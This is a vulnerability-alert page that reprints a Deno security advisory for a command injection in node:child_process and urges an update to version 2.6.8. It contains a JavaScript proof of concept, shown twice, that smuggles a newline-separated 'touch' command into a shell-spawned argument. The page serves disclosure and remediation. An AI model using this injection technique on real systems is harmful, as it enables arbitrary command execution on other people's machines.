Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.1
Deno's Node Child Process Feature Allows Malicious Commands
CVE-2026-27190
GHSA-hmh4-3xvx-q5hr
Summary
Deno's child process feature allows attackers to execute arbitrary commands, which means unauthorized access to your system. This is a serious issue because it can lead to data theft or system compromise. To fix this, update to the latest version of Deno, version 2.6.8, as soon as possible.
What to do
- Update deno to version 2.6.8.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | deno | <= 2.6.8 | 2.6.8 |
| deno | deno | <= 2.6.8 | – |
Original title
Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process
Original description
## Summary
A command injection vulnerability exists in Deno's `node:child_process` implementation.
## Reproduction
```javascript
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
shell: true,
encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
```
Run: `deno run --allow-all poc.mjs`
The file `/tmp/rce_proof` is created, confirming arbitrary command execution.
## Mitigation
All users need to update to the patched version (Deno v2.6.8).
A command injection vulnerability exists in Deno's `node:child_process` implementation.
## Reproduction
```javascript
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
shell: true,
encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
```
Run: `deno run --allow-all poc.mjs`
The file `/tmp/rce_proof` is created, confirming arbitrary command execution.
## Mitigation
All users need to update to the patched version (Deno v2.6.8).
nvd CVSS3.1
9.8
Vulnerability type
CWE-78
OS Command Injection
- https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c Patch
- https://github.com/denoland/deno/releases/tag/v2.6.8 Product Release Notes
- https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr Exploit Vendor Advisory
- https://nvd.nist.gov/vuln/detail/CVE-2026-27190
- https://github.com/advisories/GHSA-hmh4-3xvx-q5hr
Published: 19 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026